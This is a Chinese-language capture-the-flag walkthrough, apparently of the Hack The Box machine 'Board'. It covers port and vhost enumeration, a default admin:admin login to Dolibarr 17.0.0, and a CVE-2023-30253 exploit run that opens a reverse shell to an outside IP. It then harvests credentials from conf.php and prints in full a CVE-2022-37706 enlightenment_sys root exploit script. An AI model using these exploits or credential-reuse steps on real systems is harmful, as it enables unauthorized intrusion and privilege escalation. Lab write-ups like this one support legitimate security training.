Recon:

1
rustscan -a 10.10.11.11 --range 1-65535

image-20240816101716610

1
nmap 10.10.11.11 -p22,80 -sC -sV

image-20240816101745106

80端口web服务并没有什么有趣的地方:

image-20240816103002702

枚举Vhost:

1
wfuzz -c -u http://board.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host:FUZZ.board.htb" --hh 15949

image-20240816103050501

image-20240816103651337

谷歌搜索Dolibarr 17.0.0会发现一个漏洞:

image-20240816103728272

该漏洞需要用户名和密码,但是用户名和密码在尝试admin:admin便成功登录了进去:

image-20240816103841704

使用以下POC:

1
https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253.git
1
python exploit.py http://crm.board.htb admin admin 10.10.16.7 443

image-20240816104034550

接收到shell:

image-20240816104055327

在/var/www/html/crm.board.htb/htdocs/conf/conf.php中包含数据库密码:

image-20240816104920757

密码可以被用来larissa用户登录密码:

image-20240816105035018

运行lipeas.sh,发现疑似有漏洞的二进制:

image-20240816105815910

谷歌搜索会发现有个漏洞:

image-20240816105859705

POC:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#!/bin/bash

echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."

file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
	echo "[-] Couldn't find the vulnerable SUID file..."
	echo "[*] Enlightenment should be installed on your system."
	exit 1
fi

echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"

echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net

image-20240816110015633